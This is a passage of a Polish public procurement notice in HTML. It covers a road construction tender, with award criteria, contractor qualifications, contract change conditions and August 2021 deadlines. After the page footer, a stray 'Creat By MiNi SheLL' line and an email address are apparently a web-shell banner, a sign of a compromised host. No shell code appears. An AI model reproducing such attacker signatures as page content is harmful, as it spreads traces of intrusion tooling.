pkt. 7 i 8<br/>ustawy Prawo zamówień publicznych, polegających na powtórzeniu podobnych robót budowlanych,<br/>zgodnych z przedmiotem zamówienia podstawowego. Przedmiot zamówienia: podobne roboty<br/>budowlane zgodne z przedmiotem zamówienia podstawowego o kodach CPV określonych w tym<br/>zamówieniu. Wielkość lub zakres zamówienia: do 20% wartości zamówienia podstawowego. Warunki<br/>na jakich zostanie udzielone zamówienie: zgodnie z warunkami dotyczącymi zamówienia<br/>podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się<br/>następującymi kryteriami, z przypisaniem im odpowiednio wag:<br/>1) cena oferty – 60%<br/>2) okres gwarancji – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych w art.<br/>112 ust. 2 ustawy pzp dotyczących zdolności technicznej i zawodowej:<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi wykaz robót<br/>budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia w którym upływa<br/>termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie<br/>minimum jedną robotę budowlaną o wartości min. 200.000,00 zł brutto (słownie: dwieście tysięcy<br/>złotych), która w swoim zakresie miała budowę lub przebudowę drogi (należy przez to rozumieć<br/>budowę lub przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.<br/>U. z 2020 r., poz. 1333, z późn. zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających spełnianie<br/>warunków udziału w postępowaniu:<br/>1) wykaz robót wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia w którym upływa termin<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum jedną<br/>robotę budowlaną o wartości min. 200 000,00 zł brutto (słownie: dwieście tysięcy złotych), która w<br/>swoim zakresie miała budowę lub przebudowę drogi (należy przez to rozumieć budowę lub<br/>przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2020 r., poz.<br/>1333, z późn. zm.) - z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów - inne dokumenty (wzór wykazu - załącznik nr 5 do SWZ)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3. Wykonawca dołącza do oferty oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy, którego<br/>wzór stanowią załączniki nr 2 i 3 do SWZ. Oświadczenie stanowi dowód potwierdzający brak<br/>podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o<br/>którym mowa powyżej - załączniki nr 2 i 3 do SWZ, składa każdy z Wykonawców. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5. W przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, Wykonawca przedstawia, wraz z oświadczeniem, o którym mowa w<br/>ust. 2, także oświadczenie podmiotu udostępniającego zasoby - załączniki nr 2 i 3 do SWZ,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>6. W przypadku Wykonawcy, który zamierza powierzyć wykonanie części zamówienia<br/>Podwykonawcy, Wykonawca przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 3,<br/>także oświadczenie Podwykonawcy - załącznik nr 2 do SWZ, potwierdzające brak podstaw<br/>wykluczenia tego Podwykonawcy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty należy<br/>załączyć pełnomocnictwo dla pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. W odniesieniu<br/>do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub<br/>usługi wykonają poszczególni Wykonawcy. W przypadku wspólnego ubiegania się Wykonawców<br/>o udzielenie zamówienia Zamawiający bada, czy nie zachodzą podstawy wykluczenia wobec<br/>każdego z tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy w zakresie ceny, może nastąpić w razie ustawowej zmiany stawki podatku od<br/>towarów i usług VAT.<br/>W zakresie zmiany terminu realizacji w przypadkach:<br/>a) wydanie decyzji administracyjnej<br/>o wstrzymaniu robót w wyniku interwencji obywatela lub organizacji społecznej;<br/>b) wstrzymanie robót przez Zamawiającego lub przez uprawnione organy z przyczyn<br/>niewynikających<br/>z winy stron Umowy;<br/>c) wystąpienie nieprzewidzianych zjawisk atmosferycznych, (np.: wichury, ulewy, śnieżyce,<br/>gradobicie, mrozy) mogących spowodować zniszczenie robót lub konieczność wstrzymania<br/>robót ze względu na zachowanie reżimów technologicznych (temperatura, wilgotność); Uznaje<br/>się, że powyższe zjawiska atmosferyczne wówczas są traktowane jako nieprzewidziane jeśli wystąpią w porze roku, w której<br/>z definicji nie występują;<br/>d) wystąpienia siły wyższej, rozumianej jako zdarzenie niemożliwe do przewidzenia, na które<br/>Strony nie mają wpływu i są przez Strony niemożliwe do pokonania, a w szczególności: klęski<br/>żywiołowe, wojny, zamknięcie granic uniemożliwiające wykonanie umowy w całości lub w części,<br/>pod warunkiem dostarczenia w terminie 5 dni od dnia zaistnienia siły wyższej, przez Stronę<br/>dotkniętą wystąpienie siły wyższej, dokumentu potwierdzającego zaistnienie siły wyższej<br/>wystawionego przez właściwy organ administracji publicznej oraz wskazania wpływu zdarzenia<br/>na wykonanie umowy, i jeśli wystąpienie siły wyższej wpłynął bezpośrednio na prawidłowe<br/>wykonywanie robót i termin ich wykonania to termin wykonania umowy zostanie przedłużony o<br/>czas jej trwania;<br/>e) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia<br/>losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć<br/>z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące<br/>powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub zaniechaniem;<br/>f) wystąpienie warunków gruntowo – wodnych uniemożliwiających wykonanie<br/>(prowadzenie)robót budowlanych zgodnie ze sztuką budowlaną, przeprowadzenie prób i<br/>sprawdzeń, dokonywanie odbiorów;<br/>g) zmiana spowodowana nieprzewidzianymi w specyfikacji warunkami geologicznymi,<br/>archeologicznymi lub terenowymi, w szczególności istnieniem niezinwentaryzowanych lub<br/>błędnie zinwentaryzowanych obiektów budowlanych lub niewypałów lub niewybuchów lub<br/>wykopalisk archeologicznych, itp.;<br/>h) konieczność usunięcia błędów lub wad w dokumentacji projektowej albo konieczność<br/>wprowadzenia zmian w dokumentacji projektowej lub specyfikacjach technicznych wykonania i<br/>odbioru robót, które maja wpływ na termin wykonania przedmiotu umowy;<br/>i) konieczność zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy<br/>zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w<br/>dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany<br/>stanu prawnego w oparciu o które je przygotowano, gdyby zastosowanie przewidzianych<br/>rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu umowy;<br/>j) konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania<br/>przedmiotu Umowy, które wstrzymują lub opóźniają realizację przedmiotu Umowy;<br/>k) wystąpienie niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez<br/>inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji;<br/>l) wystąpienia na terenie kraju pandemii lub epidemii powodującej konieczność wstrzymania<br/>kluczowych robót z uwagi na brak materiałów lub nieobecność pracowników;<br/>m) przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki<br/>ochrony prawnej wykorzystywane przez wykonawców lub inne podmioty, lub Zamawiającego<br/>przed zawarciem umowy;<br/>n) w związku z okolicznościami nie mającymi związku z prowadzonymi robotami budowlanymi, a<br/>wynikającymi z prowadzonej przez inwestora działalności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-13 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-13 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-11</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com